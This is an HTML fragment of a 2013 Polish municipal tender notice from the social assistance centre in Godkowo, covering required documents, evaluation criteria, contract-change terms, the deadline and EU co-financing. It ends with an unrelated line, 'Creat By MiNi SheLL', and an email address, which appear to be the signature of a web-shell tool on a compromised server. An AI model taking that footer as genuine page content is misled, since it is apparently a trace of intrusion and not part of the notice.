</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz oferty przetargowej stanowiący załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zleceniodawca zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
- zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy,
- w przypadku zmian na liście Uczestników projektu i/lub Indywidualnych Planów Działania liczba osób biorących udział w poszczególnych kursach może ulec zmianie. Do obliczenia należnego wynagrodzenia zastosuje się wówczas algorytm (cena ryczałtowa za daną liczbę Uczestników przewidzianych SIWZ * liczba Uczestników biorących udział w kursie),
- za zgodą Zamawiającego termin realizacji zamówienia może ulec zmianom.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uggodkowo.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Godkowie, Godkowo 14, 14 - 407 Godkowo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2013 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Godkowie, Godkowo 14, 14 - 407 Godkowo.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com